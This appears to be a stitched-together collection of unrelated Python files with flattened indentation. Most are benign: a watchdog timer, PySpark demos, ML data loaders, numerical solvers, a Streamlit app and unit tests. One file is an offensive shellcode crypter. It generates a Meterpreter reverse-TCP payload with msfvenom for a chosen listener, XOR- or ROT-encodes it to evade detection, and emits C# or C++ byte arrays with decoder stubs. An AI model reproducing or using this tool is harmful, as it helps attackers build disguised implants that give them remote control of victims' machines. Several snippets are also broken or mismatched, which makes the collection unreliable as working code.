def __init__(self, watchdogfile="/dev/watchdog" ):
self.ok = os.path.exists(watchdogfile)
self.watchdog = watchdogfile
if self.ok:
self.ok = os.access(watchdogfile, os.W_OK)
return
# Open the watchdog file for writing.
# ATTENTION, this already activates the watchdog! If you do not
# trigger the watchdog within 15 seconds, the system will reset!
def open(self):
if self.ok:
try:
self.wdthandle = open(self.watchdog, "w")
except:
self.ok = False
return self.ok
# Deactivate the watchdog timer by sending the magic character
def deactivate(self):
try:
self.wdthandle.write("V")
self.wdthandle.flush()
except:
self.ok = False
return self.ok
# refresh the watchdog
def refresh(self):
try:
self.wdthandle.write(" ")
self.wdthandle.flush()
self.ok = True
except:
self.ok = False
return self.ok
# Close the watchdog file (don't forget to deactivate before closing!)
def finish(self):
try:
self.wdthandle.close()
self.ok = True
except:
self.ok = False
return self.ok
def status(self):
return self.ok
# Main function, used here mainly as a test
def main():
wd = wdt() # Create watchdog object
print(wd.status()) # print the status
wd.open() # Open the watchdog file
print(wd.status()) # print the status (if watchdog could be activated)
while True:
try:
wd.refresh() # Retrigger the watchdog
print("Watchdog kicked") # Talk about what you did!
print(wd.status())
time.sleep(1.0) # Wait for one second before kicking the watchdog again
except KeyboardInterrupt: # If the user presses ctrl+c
print("ctrl+c pressed, will terminate")
wd.deactivate() # Deactivate the watchdog so the system is not rebooted
wd.finish() # release the file handle
sys.exit() # exit
# Only run main, if this program is called directly (not imported by another program)
if __name__ == "__main__":
main()
|
#! encoding=utf8
# ======================================================================================================================================
# Serialization is used for performance tuning on Apache Spark. All data that is sent over the network or written to the disk or persisted
# in the memory should be serialized. Serialization plays an important role in costly operations.
# PySpark supports custom serializers for performance tuning. The following two serializers are supported by PySpark −
# MarshalSerializer
# Serializes objects using Python’s Marshal Serializer. This serializer is faster than PickleSerializer, but supports fewer datatypes.
# PickleSerializer
# Serializes objects using Python’s Pickle Serializer. This serializer supports nearly any Python object, but may not be as fast as
# more specialized serializers.
# ======================================================================================================================================
from pyspark.context import SparkContext
from pyspark.serializers import MarshalSerializer
sc = SparkContext("local", "serialization app", serializer = MarshalSerializer())
print(sc.parallelize(list(range(1000))).map(lambda x: 2 * x).take(10))
sc.stop()
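# For comparison, a minimal sketch of the same job using PickleSerializer instead
# (illustrative only: slower for simple types, but it handles nearly any Python object).
# PickleSerializer is importable from pyspark.serializers as well.
from pyspark.serializers import PickleSerializer
sc = SparkContext("local", "serialization app (pickle)", serializer=PickleSerializer())
print(sc.parallelize(list(range(1000))).map(lambda x: 2 * x).take(10))
sc.stop()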
|
import csv
from itertools import product
import os
import random
import time
import numpy as np
import mxnet as mx
import tensorflow as tf
import torch as pt
from common import render_exception
def set_seed(seed):
# cover our bases: different frameworks and libraries
# need to have their seeds set
np.random.seed(seed)
mx.random.seed(seed)
tf.set_random_seed(seed)
pt.manual_seed(seed)
random.seed(seed)
def configure_seed(config):
"""
Convenience for experiment scripts: Takes an experiment config
and sets the seed if specified.
Assumes that the config has a boolean field called 'set_seed'
and an integer field called 'seed' for determining whether to
set the seed and the value to use.
"""
if config['set_seed']:
set_seed(config['seed'])
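# A minimal usage sketch (the config dict below is hypothetical, not from any experiment file):
# configure_seed({'set_seed': True, 'seed': 42})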
def _write_row(writer, fieldnames, fields):
record = {}
for i in range(len(fieldnames)):
record[fieldnames[i]] = fields[i]
writer.writerow(record)
def _score_loop(num, trial, trial_args, setup_args, n_times, dry_run, writer, fieldnames):
for i in range(dry_run + n_times):
if i == dry_run:
tic = time.time()
start = time.time()
out = trial(*trial_args)
end = time.time()
if i >= dry_run:
_write_row(writer, fieldnames, setup_args + [num, i, end - start])
final = time.time()
return (final - tic) / n_times
def run_trials(method, task_name,
dry_run, times_per_input, n_input,
trial, trial_setup, trial_teardown,
parameter_names, parameter_ranges,
path_prefix = '',
append_to_csv = False):
try:
filename = os.path.join(path_prefix, '{}-{}.csv'.format(method, task_name))
if not os.path.exists(os.path.dirname(filename)):
os.makedirs(os.path.dirname(filename))
mode = 'a' if append_to_csv else 'w'
with open(filename, mode, newline='') as csvfile:
fieldnames = parameter_names + ['rep', 'run', 'time']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
if not append_to_csv:
writer.writeheader()
for args in product(*parameter_ranges):
costs = []
for t in range(n_input):
score = 0.0
try:
trial_args = trial_setup(*args)
score = _score_loop(t, trial, trial_args, list(args),
times_per_input, dry_run,
writer, fieldnames)
trial_teardown(*trial_args)
except Exception as e:
# can provide more detailed summary if
# it happened inside a trial
return (False,
'Encountered exception in trial on inputs {}:\n'.format(args)
+ render_exception(e))
if t != n_input - 1:
time.sleep(4)
costs.append(score)
print(method, task_name, args, ["%.6f" % x for x in costs])
return (True, 'success')
except Exception as e:
return (False, 'Encountered exception:\n' + render_exception(e))
def _array2str_round(x, decimal=6):
""" Pretty-print an array of floats (or a single float) as a rounded string
Parameters
----------
x: array of float, or float
decimal: int
"""
if isinstance(x, list) or isinstance(x, np.ndarray):
return "[" + ", ".join([array2str_round(y, decimal=decimal)
for y in x]) + "]"
format_str = "%%.%df" % decimal
return format_str % x
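# Illustrative example of the expected output (not part of the original script):
# _array2str_round([1.23456789, 2.0]) -> "[1.234568, 2.000000]"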
|
import cv2
import pafy
from genericDetector import GenericDetector
model_path='models/object_detection_mobile_object_localizer_v1_1_default_1.tflite'
threshold = 0.25
out = cv2.VideoWriter('outpy2.avi',cv2.VideoWriter_fourcc('M','J','P','G'), 30, (720,720))
# Initialize video
# cap = cv2.VideoCapture("video.avi")
videoUrl = 'https://youtu.be/uKyoV0uG9rQ'
videoPafy = pafy.new(videoUrl)
print(videoPafy.streams)
cap = cv2.VideoCapture(videoPafy.streams[-1].url)
# Initialize object detection model
detector = GenericDetector(model_path, threshold)
cv2.namedWindow("Detections", cv2.WINDOW_NORMAL)
cap.set(cv2.CAP_PROP_POS_FRAMES, 60)
while cap.isOpened():
try:
# Read frame from the video
ret, frame = cap.read()
except:
continue
if ret:
# Draw the detected objects
detections = detector(frame)
detection_img = detector.draw_detections(frame, detections)
out.write(detection_img)
cv2.imshow("Detections", detection_img)
else:
break
# Press key q to stop
if cv2.waitKey(1) == ord('q'):
break
cap.release()
out.release()
cv2.destroyAllWindows()
|
import streamlit as st
import datetime as dt
with st.sidebar:
n_holes = int(st.number_input("No. of hole played", min_value=1))
format_hole = lambda x: f"Hole {x}"
hole = st.selectbox("Select hole to edit:", range(1, n_holes+1), format_func=format_hole)
possible_end_lies = ["Fairway", "Green", "In The Hole", "Bermuda", "Recovery", "Kitchen"]
possible_start_lies = ["Fairway", "Recovery", "Kitchen"]
@st.cache
def add_shots_to_container(container, hole_no):
n_shots = int(
container.number_input("No. of shots played: ", min_value=1, key=hole_no)
)
shots_dict = {"hole_id": hole_no}
end_distances, end_lies, units = [], [], []
for i in range(n_shots):
shot_number = i + 1
if i == 0:
start_lie = container.selectbox(f"Shot {shot_number} start lie", possible_start_lies, key=f"start {hole_no}")
start_distance = container.number_input(
f"Shot {shot_number} start distance (yds) ", min_value=0, key=f"start dist {hole_no}"
)
shots_dict["hole_yards"] = start_distance
shots_dict["tee_lie"] = start_lie
shot_end_lie = container.selectbox(f"Shot {shot_number} end lie", possible_end_lies, key=f"end lie h:{hole_no} s:{shot_number}")
unit = "ft" if shot_end_lie in ["Green", "Bermuda"] else "yds"
end_distance = container.number_input(f"Shot {shot_number} end distance ({unit}) ", key=f"end dist h:{hole_no} s:{shot_number}")
else:
shot_end_lie = container.selectbox(f"Shot {shot_number} end lie", possible_end_lies, key=f"end lie h:{hole_no} s:{shot_number}")
unit = "ft" if shot_end_lie in ["Green", "Bermuda"] else "yds"
end_distance = container.number_input(f"Shot {shot_number} end distance ({unit}) ", key=f"end dist h:{hole_no} s:{shot_number}")
end_distances.append(end_distance)
end_lies.append(shot_end_lie)
units.append(unit)
shot_details = {
"shot_end_lie": end_lies,
"shot_end_distance": end_distances,
"distance_units": units,
"update_time":dt.datetime.now()
}
shots_dict["shot_details"] = shot_details
return shots_dict
if "shots_data" not in st.session_state:
st.session_state.shots_data = {}
cont = st.container()
cont.write(f"Hole No. {hole}")
shots_dict = add_shots_to_container(cont, hole)
st.session_state.shots_data["hole_id"] = hole
st.session_state.shots_data["hole_details"] = shots_dict
|
class Option:
def __init__(self, description: str = "...", type: int = 3, required: bool = False):
# 'required' is referenced in to_dict() but was never set; a default of False is assumed here
self.description = description
self.type = type
self.required = required
def to_dict(self):
return {
"type": self.type,
"description": self.description,
"required": self.required
}
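# A minimal usage sketch (the field values below are illustrative assumptions):
# opt = Option(description="A string argument", type=3, required=True)
# opt.to_dict() -> {"type": 3, "description": "A string argument", "required": True}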
|
#!/usr/bin/python3
# Basic shellcode crypter for C# payloads
# By Cas van Cooten
import re
import platform
import argparse
import subprocess
from random import randint
if platform.system() != "Linux":
exit("[x] ERROR: Only Linux is supported for this utility script.")
class bcolors:
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
# Parse input arguments
def auto_int(x):
return int(x, 0)
parser = argparse.ArgumentParser()
parser.add_argument("lhost", help="listener IP to use")
parser.add_argument("lport", help="listener port to use")
parser.add_argument("format", help="the language to format the output in ('cs' or 'cpp')", nargs='?', default="cs")
parser.add_argument("encoding", help="the encoding type to use ('xor' or 'rot')", nargs='?', default="xor")
parser.add_argument("key", help="the key to encode the payload with (integer)", type=auto_int, nargs='?', default=randint(1,255))
parser.add_argument("payload", help="the payload type from msfvenom to generate shellcode for (default: windows/x64/meterpreter/reverse_tcp)", nargs='?', default="windows/x64/meterpreter/reverse_tcp")
args = parser.parse_args()
# Generate the shellcode given the preferred payload
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Generating payload {bcolors.OKGREEN}{args.payload}{bcolors.OKBLUE} for LHOST={bcolors.OKGREEN}{args.lhost}{bcolors.OKBLUE} and LPORT={bcolors.OKGREEN}{args.lport}{bcolors.ENDC}")
result = subprocess.run(['msfvenom', '-p', args.payload, f"LHOST={args.lhost}", f"LPORT={args.lport}", 'exitfunc=thread', "-f", "csharp"], stdout=subprocess.PIPE)
if result.returncode != 0:
exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Msfvenom generation unsuccessful. Are you sure msfvenom is installed?{bcolors.ENDC}")
# Get the payload bytes and split them
payload = re.search(r"{([^}]+)}", result.stdout.decode("utf-8")).group(1).replace('\n', '').split(",")
# Format the output payload
if args.format == "cs":
# Encode the payload with the chosen type and key
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Encoding payload with type {bcolors.OKGREEN}{args.encoding}{bcolors.OKBLUE} and key {bcolors.OKGREEN}{args.key}{bcolors.ENDC}")
for i, byte in enumerate(payload):
byteInt = int(byte, 16)
if args.encoding == "xor":
byteInt = byteInt ^ args.key
elif args.encoding == "rot":
byteInt = byteInt + args.key & 255
else:
exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid encoding type.{bcolors.ENDC}")
payload[i] = "{0:#0{1}x}".format(byteInt,4)
payLen = len(payload)
payload = re.sub("(.{65})", "\\1\n", ','.join(payload), 0, re.DOTALL)
payloadFormatted = f"// msfvenom -p {args.payload} LHOST={args.lhost} LPORT={args.lport} EXITFUNC=thread -f csharp\n"
payloadFormatted += f"// {args.encoding}-encoded with key {hex(args.key)}\n"
payloadFormatted += f"byte[] buf = new byte[{str(payLen)}] {{\n{payload.strip()}\n}};"
if payLen > 1000:
f = open("/tmp/payload.txt", "w")
f.write(payloadFormatted)
f.close()
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload written to '/tmp/payload.txt' in CSharp format!{bcolors.ENDC}")
else:
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload (CSharp):{bcolors.ENDC}")
print(payloadFormatted + "\n")
# Provide the decoding function for the heck of it
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Decoding function:{bcolors.ENDC}")
if args.encoding == "xor":
decodingFunc = f"""for (int i = 0; i < buf.Length; i++)
{{
buf[i] = (byte)((uint)buf[i] ^ {hex(args.key)});
}}"""
if args.encoding == "rot":
decodingFunc = f"""for (int i = 0; i < buf.Length; i++)
{{
buf[i] = (byte)(((uint)buf[i] - {hex(args.key)}) & 0xFF);
}}"""
print(decodingFunc)
elif args.format == "cpp":
# Encode the payload with the chosen type and key
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Encoding payload with type {bcolors.OKGREEN}{args.encoding}{bcolors.OKBLUE} and key {bcolors.OKGREEN}{args.key}{bcolors.ENDC}")
encodedPayload = []
for byte in payload:
byteInt = int(byte, 16)
if args.encoding == "xor":
byteInt = byteInt ^ args.key
elif args.encoding == "rot":
byteInt = byteInt + args.key & 255
else:
exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid encoding type.{bcolors.ENDC}")
encodedPayload.append(f"\\x{byteInt:02x}")
payLen = len(encodedPayload)
payload = re.sub("(.{64})", " \"\\1\"\n", ''.join(encodedPayload), 0, re.DOTALL)
payloadFormatted = f"// msfvenom -p {args.payload} LHOST={args.lhost} LPORT={args.lport} EXITFUNC=thread -f csharp\n"
payloadFormatted += f"// {args.encoding}-encoded with key {hex(args.key)}\n"
payloadFormatted += f"unsigned char buffer[] =\n {payload.strip()};"
if payLen > 1000:
f = open("/tmp/payload.txt", "w")
f.write(payloadFormatted)
f.close()
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload written to '/tmp/payload.txt' in C++ format!{bcolors.ENDC}")
else:
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload (C++):{bcolors.ENDC}")
print(payloadFormatted + "\n")
# Provide the decoding function for the heck of it
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Decoding function:{bcolors.ENDC}")
if args.encoding == "xor":
decodingFunc = f"""char bufferx[sizeof buffer];
int i;
for (i = 0; i < sizeof bufferx; ++i)
bufferx[i] = (char)(buffer[i] ^ {hex(args.key)});
"""
if args.encoding == "rot":
decodingFunc = f"""char bufferx[sizeof buffer];
int i;
for (i = 0; i < sizeof bufferx; ++i)
bufferx[i] = (char)(buffer[i] - {hex(args.key)} & 255);
"""
print(decodingFunc)
else:
exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid formatting type (choose 'cs' for CSharp or 'cpp' for C++).{bcolors.ENDC}")
|
def Odd_and_Even_Sum(number_as_string):
odd_sum = 0
even_sum = 0
for element in number_as_string:
if int(element) % 2 == 0:
even_sum += int(element)
else:
odd_sum += int(element)
return (f"Odd sum = {odd_sum}, Even sum = {even_sum}")
number = input()
result = Odd_and_Even_Sum(number)
print(result)
|
class TriangleType:
def type(self, a, b, c):
s = sorted([a, b, c])
if s[2] >= s[0] + s[1]:
return "IMPOSSIBLE"
# cmp() was removed in Python 3; compare the squared side lengths directly
lhs, rhs = s[0] ** 2 + s[1] ** 2, s[2] ** 2
if lhs == rhs:
return "RIGHT"
elif lhs > rhs:
return "ACUTE"
return "OBTUSE"
|
from tqdm import tqdm
from os.path import join, exists
import json
import collections
import tensorflow as tf
import random
random.seed(0)
class ZaloDatasetProcessor(object):
""" Base class to process & store input data for the Zalo AI Challenge dataset"""
label_list = ['False', 'True']
def __init__(self):
""" ZaloDatasetProcessor constructor
:parameter val_size: The size of the valelopment set taken from the training set
"""
self.train_data = []
self.val_data = []
self.test_data = []
def load_from_path(self, dataset_path, mode='train', file_name='train.json', encode='utf-8'):
""" Load data from file & store into memory
Need to be called before preprocess(before write_all_to_tfrecords) is called
:parameter dataset_path: The path to the directory where the dataset is stored
:parameter encode: The encoding of every dataset file
"""
mode = mode.lower()
assert mode in ['train', 'test', 'val', 'squad'], "[Preprocess] mode must be one of 'train', 'test', 'val' or 'squad'"
def read_to_inputs(filepath, encode='utf-8', mode='train'):
""" A helper function that read a json file (Zalo-format) & return a list of input
:parameter filepath The source file path
:parameter encode The encoding of the source file
:parameter mode Return data for training ('normal') or for submission ('zalo')
:returns A list of input for each data instance, order preserved
"""
try:
with open(filepath, 'r', encoding=encode) as file:
data = json.load(file)
if mode == 'squad':
data = data.get('data')
res = []
for d in data:
for par in d.get('paragraphs'):
context = par.get('context')
for qas in par.get('qas'):
try:
ques = qas.get('question')
# answer = qas.get('answers')
label = qas.get('is_impossible')
# if label:
# answer_start = qas.get('plausible_answers')[0]['answer_start']
# answer = ' '.join(context.split(' ')[answer_start:])
# else:
# answer = ''
res.append({'question': ques,
'text': context,
'label': label})
except:
pass
return res
else:
return [{'question': data_instance['question'],
'text': data_instance['text'],
'label': data_instance.get('label', False)}
for data_instance in tqdm(data)]
except FileNotFoundError:
return []
# Get train data, convert to input
if mode == "train":
train_data = read_to_inputs(filepath=join(dataset_path, file_name),
encode=encode, mode="train")
self.train_data.extend(train_data)
# Get val data, convert to input
if mode == "val":
val_data = read_to_inputs(filepath=join(dataset_path, file_name),
encode=encode, mode="val")
self.val_data.extend(val_data)
if mode == "test":
test_data = read_to_inputs(filepath=join(dataset_path, file_name),
encode=encode, mode="test")
self.test_data.extend(test_data)
if mode == "squad":
train_data = read_to_inputs(filepath=join(dataset_path, file_name),
encode=encode, mode="squad")
self.train_data.extend(train_data)
# Shuffle training data
random.shuffle(self.train_data)
# Shuffle validate data
random.shuffle(self.val_data)
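# A minimal usage sketch (paths and file names below are illustrative assumptions):
# processor = ZaloDatasetProcessor()
# processor.load_from_path('./dataset', mode='train', file_name='train.json')
# processor.load_from_path('./dataset', mode='test', file_name='test.json')
# print(len(processor.train_data), len(processor.test_data))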
|
# -*- coding: utf-8 -*-
"""
Milstein's method on linear SDE
dX = λ*X dt + μ*X dW, X(0) = X0
timesteps for Brownian and Integrator are dt and Dt (see em.py)
"""
import numpy as np
from numpy.random import randn
import matplotlib.pyplot as plt
np.random.seed(100)
# problem parameters
λ = 2; μ = 1; X0 = 1
T = 1; N = 2**9; dt = T / N
t = np.arange(0, T+dt, dt)
# Brownian path
dW = np.sqrt(dt) * randn(N)
W = np.hstack(([0], np.cumsum(dW)))
# true solution for comparison
Xtrue = X0 * np.exp((λ-.5*μ**2)*t + μ*W)
# factor and numerical timestep
R = 1; Dt = R*dt
# numerical solution
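# The Milstein update implemented below, restated as a formula for reference:
# X_{n+1} = X_n + λ*X_n*Δt + μ*X_n*ΔW_n + 0.5*μ²*X_n*(ΔW_n² - Δt)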
Xem = np.zeros(N//R+1)
Xem[0] = X0
for i in range(1, N//R+1):
Winc = np.sum(dW[R*(i-1):R*i])
Xem[i] = Xem[i-1] + λ*Xem[i-1]*dt + μ*Xem[i-1]*Winc \
+ .5*μ**2*Xem[i-1] * (Winc**2 - dt)
plt.plot(t, Xtrue, 'b-')
plt.plot(t[::R], Xem, 'r:')
plt.xlabel('t')
plt.ylabel('X(t)')
print('err: %f' % np.abs(Xtrue[-1]-Xem[-1]))
|
from rest_framework import routers
from .api import (
AttemptLogViewSet, ContentSessionLogViewSet, ContentSummaryLogViewSet, ExamAttemptLogViewSet, ExamLogViewSet, MasteryLogViewSet,
TotalContentProgressViewSet, UserSessionLogViewSet
)
from .csv import ContentSessionLogCSVExportViewSet, ContentSummaryLogCSVExportViewSet
router = routers.SimpleRouter()
router.register(r'contentsessionlog', ContentSessionLogViewSet, base_name='contentsessionlog')
router.register(r'contentsummarylog', ContentSummaryLogViewSet, base_name='contentsummarylog')
router.register(r'usersessionlog', UserSessionLogViewSet, base_name='usersessionlog')
router.register(r'masterylog', MasteryLogViewSet, base_name='masterylog')
router.register(r'attemptlog', AttemptLogViewSet, base_name='attemptlog')
router.register(r'examlog', ExamLogViewSet, base_name='examlog')
router.register(r'examattemptlog', ExamAttemptLogViewSet, base_name='examattemptlog')
router.register(r'userprogress', TotalContentProgressViewSet, base_name='userprogress')
router.register(r'contentsummarylogcsv', ContentSummaryLogCSVExportViewSet, base_name='contentsummarylogcsv')
router.register(r'contentsessionlogcsv', ContentSessionLogCSVExportViewSet, base_name='contentsessionlogcsv')
urlpatterns = router.urls
|
from unittest.case import TestCase
from unittest.mock import patch
import pytest
import requests_mock
from .. import Rumetr, exceptions
@requests_mock.Mocker()
@patch.object(Rumetr, 'check_complex', return_value=True)
class TestHouseChecking(TestCase):
TEST_URL = 'http://api.host.com/developers/dvlpr/complexes/cmplx/houses/{house}/'
def setUp(self):
self.r = Rumetr('test', developer='dvlpr', api_host='http://api.host.com')
def test_house_ok(self, m, house_checker):
m.get(self.TEST_URL.format(house='100500'), json={})
assert self.r.check_house('cmplx', 100500)
assert 'cmplx__100500' in self.r._checked_houses # house is saved in the cache
assert house_checker.call_count == 1 # the complex has been checked as well
def test_house_is_not_checked_for_the_second_time(self, *args):
self.r._checked_houses = {'cmplx__100500'}
assert self.r.check_house('cmplx', 100500) # should return True without a mock
def test_house_fail(self, m, *args):
m.get(self.TEST_URL.format(house='100500'), status_code=404)
with pytest.raises(exceptions.RumetrHouseNotFound):
assert self.r.check_house('cmplx', 100500)
def test_house_exists_1(self, m, *args):
m.get(self.TEST_URL.format(house='100500'), json={})
assert self.r.house_exists('cmplx', 100500)
def test_house_exists_2(self, m, *args):
m.get(self.TEST_URL.format(house='100500'), json={}, status_code=404)
assert not self.r.house_exists('cmplx', 100500)
|
def convert_to_binary(prm1):
_bits_needed = 1
_start = 1
_user_value = int(prm1)
_original_in = str(_user_value)
_binary_value = ""
""" Loop through the numbers from 1 increasing by
a power of 2 until we get a number that is equal
to or exceeds the users input. Increase bit
counter for each number needed """
while _user_value > _start:
_bits_needed = _bits_needed + 1
_start = _start * 2
""" When the user value is not equal to a result of a
multiplication, roll back to previous multiplication
as it will cause an erroneous bit value at the beginning
of the binary number. e.g. 31 will create a 32 value erroneously """
if _user_value != _start:
_bits_needed = _bits_needed - 1
_start = _start / 2
for x in range(_bits_needed):
if _user_value >= _start:
_user_value = _user_value - _start
_binary_value = _binary_value + "1"
_start = _start / 2
else:
_binary_value = _binary_value + "0"
_start = _start / 2
""" Break the loop and work out whether or not the final
digit of the binary number should be 0 or 1 """
if _start == 1:
if _user_value == 1: # avoids a ZeroDivisionError when nothing remains
_binary_value = _binary_value + "1"
else:
_binary_value = _binary_value + "0"
if _binary_value == "":
_binary_value = "0"
return _binary_value
def get_ip_address():
print("What is the IP address?")
_user_input = input() + "."
_group_dict = []
_temp = str("")
_binary_ip = ""
"""Split the IP address into multiple clusters. Perform the function on each function individually."""
for i in range(len(_user_input)):
if _user_input[i].isnumeric():
_temp = _temp + str(_user_input[i])
else:
_group_dict.append(_temp)
_temp = str("")
for i in range(len(_group_dict)):
_preceding_zeroes = 8 - len(str(convert_to_binary(_group_dict[i])))
for j in range(_preceding_zeroes):
_binary_ip = _binary_ip + str("0")
_binary_ip = _binary_ip + str(convert_to_binary(_group_dict[i])) + "."
return _binary_ip.rstrip(".")
running = True
while running:
print(get_ip_address())
|
def navier_stokes_x(i, j, u, u_tp, v, dx, dy, dt, Re):
uu_f = ((1.0/2.0) * (u[i+1, j] + u[i, j]))**2.0
uu_b = ((1.0/2.0) * (u[i-1, j] + u[i, j]))**2.0
Duu_x = (uu_f - uu_b)/dx
u_sum_f = u[i, j] + u[i, j+1]
u_sum_b = u[i, j] + u[i, j-1]
v_sum_f = v[i, j] + v[i+1, j]
v_sum_b = v[i, j-1] + v[i+1, j-1]
uv_x_f = (1.0/2.0)*(u_sum_f)*(1.0/2.0)*(v_sum_f)
uv_x_b = (1.0/2.0)*(u_sum_b)*(1.0/2.0)*(v_sum_b)
D2u_x2 = ((u[i+1, j] - 2.0*u[i, j] + u[i-1, j])/dx**2.0)
D2u_y2 = ((u[i, j+1] - 2.0*u[i, j] + u[i, j-1])/dy**2.0)
Duv_y = (uv_x_f - uv_x_b)/dy
advection_u = Duu_x + Duv_y
diffusion_u = D2u_x2 + D2u_y2
u_tp[i, j] = u[i, j] + dt * (-advection_u + (1.0/Re) * diffusion_u)
return u_tp
def navier_stokes_y(i, j, u, v_tp, v, dx, dy, dt, Re):
vv_f = ((1.0/2.0) * (v[i, j+1] + v[i, j]))**2.0
vv_b = ((1.0/2.0) * (v[i, j] + v[i, j-1]))**2.0
Dvv_y = (vv_f - vv_b)/dy
u_sum_f = u[i, j+1] + u[i, j]
u_sum_b = u[i-1, j+1] + u[i-1, j]
v_sum_f = v[i, j] + v[i+1, j]
v_sum_b = v[i, j] + v[i-1, j]
uv_y_f = (1.0/2.0)*(u_sum_f)*(1.0/2.0)*(v_sum_f)
uv_y_b = (1.0/2.0)*(u_sum_b)*(1.0/2.0)*(v_sum_b)
D2v_x2 = ((v[i+1, j] - 2.0*v[i, j] + v[i-1, j])/dx**2.0)
D2v_y2 = ((v[i, j+1] - 2.0*v[i, j] + v[i, j-1])/dy**2.0)
Duv_x = (uv_y_f - uv_y_b)/dx
advection_v = Duv_x + Dvv_y
diffusion_v = D2v_x2 + D2v_y2
v_tp[i, j] = v[i, j] + dt * (-advection_v + (1.0/Re) * diffusion_v)
return v_tp
|
import torch
import torchvision
import torchvision.transforms as transforms
def get_transforms(dataset):
transform_train = None
transform_test = None
if dataset == 'cifar10':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
])
if dataset == 'cifar100':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
])
if dataset == 'svhn':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
])
if dataset == 'tiny':
transform_train = transforms.Compose([
transforms.RandomCrop(64, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
])
assert transform_test is not None and transform_train is not None, 'Error, no dataset %s' % dataset
return transform_train, transform_test
def get_dataloader(dataset, train_batch_size, test_batch_size, num_workers=0, root='../data', is_test=True):
transform_train, transform_test = get_transforms(dataset)
trainset, testset = None, None
if dataset == 'cifar10':
trainset = torchvision.datasets.CIFAR10(root=root, train=True, download=True, transform=transform_train)
testset = torchvision.datasets.CIFAR10(root=root, train=False, download=True, transform=transform_test)
if dataset == 'cifar100':
trainset = torchvision.datasets.CIFAR100(root=root, train=True, download=True, transform=transform_train)
testset = torchvision.datasets.CIFAR100(root=root, train=False, download=True, transform=transform_test)
if dataset == 'svhn':
trainset = torchvision.datasets.SVHN(root=root, split='train', download=True, transform=transform_train)
testset = torchvision.datasets.SVHN(root=root, split='test', download=True, transform=transform_test)
if dataset == 'tiny':
trainset = torchvision.datasets.ImageFolder(root + '/tiny-imagenet-200/train', transform=transform_train)
testset = torchvision.datasets.ImageFolder(root + '/tiny-imagenet-200/val', transform=transform_test)
assert trainset is not None and testset is not None, 'Error, no dataset %s' % dataset
trainloader = torch.utils.data.DataLoader(trainset, batch_size=train_batch_size, shuffle=True,
num_workers=num_workers)
if not is_test:
return trainloader, None
testloader = torch.utils.data.DataLoader(testset, batch_size=test_batch_size, shuffle=False,
num_workers=num_workers)
return trainloader, testloader
|
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
def build_slider(tab, multiple=False):
children = [
dbc.Card([
dbc.Row(id='app-controller', children=[
dbc.Col(children=[
dbc.Row([
dbc.Col(dbc.Button(id=tab + 'pause-button', children='start', block=True)),
dbc.Col(dbc.Button(id=tab + 'reset-button', children='reset', block=True))
])
], width=2),
dbc.Col(
dcc.Upload(
id=tab + 'upload-data',
children=html.Div([
'Drag and Drop or ',
html.A('Select Files')
]),
multiple=multiple,
style=dict(
width='100%',
textAlign='center'
)
), width=2
),
dbc.Col(
dcc.Slider(id=tab + 'slider', min=0, max=0, step=1, value=0, disabled=False),
width=7
),
dbc.Col(html.H5(id=tab + 'slider-output-container', children='0'), width=1),
], align='center', justify='start', style=dict(padding='20px')),
html.Br()
]),
html.Br()
]
return children
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `python_greek_names` package."""
from __future__ import unicode_literals
from python_text_utils.generic import Generic
from python_greek_names.utils import (
normalize_name,
VocativeMapper,
GenitiveMapper
)
def test_normalize():
assert normalize_name('ΜΑΡΣΕΛ') == Generic.to_unicode('Μαρσελ')
assert normalize_name('Μαρσέλ') == Generic.to_unicode('Μαρσέλ')
assert normalize_name('ΜΑΡΣΈΛ') == Generic.to_unicode('Μαρσέλ')
assert normalize_name('Μαρσελ', upper=True) == Generic.to_unicode('ΜΑΡΣΕΛ')
assert normalize_name('Μαρσέλ', upper=True) == Generic.to_unicode('ΜΑΡΣΈΛ')
def test_vocative_mapper():
vm = VocativeMapper()
# Testing basic usage
assert vm.as_case('Marsel') == Generic.to_unicode('Marsel')
assert vm.as_case('Μαρσέλ') == Generic.to_unicode('Μαρσέλ')
# Upper
vm_upper = VocativeMapper(upper=True)
assert vm_upper.as_case('Μαρσέλ') == Generic.to_unicode('ΜΑΡΣΈΛ')
# Unaccented
vm_accent = VocativeMapper(accent=False)
assert vm_accent.as_case('Μαρσέλ') == Generic.to_unicode('Μαρσελ')
# Testing vocative transformations
# Exceptions
assert vm.as_case('παύλος') == Generic.to_unicode('Παύλο')
# Testing endings
assert vm.as_case('Αγάπιος') == Generic.to_unicode('Αγάπιε')
assert vm.as_case('Χαράλαμπος') == Generic.to_unicode('Χαράλαμπε')
assert vm.as_case('Πάτροκλος') == Generic.to_unicode('Πάτροκλε')
assert vm.as_case('Αγισίλαος') == Generic.to_unicode('Αγισίλαε')
assert vm.as_case('Αντίγονος') == Generic.to_unicode('Αντίγονε')
assert vm.as_case('Γιάννης') == Generic.to_unicode('Γιάννη')
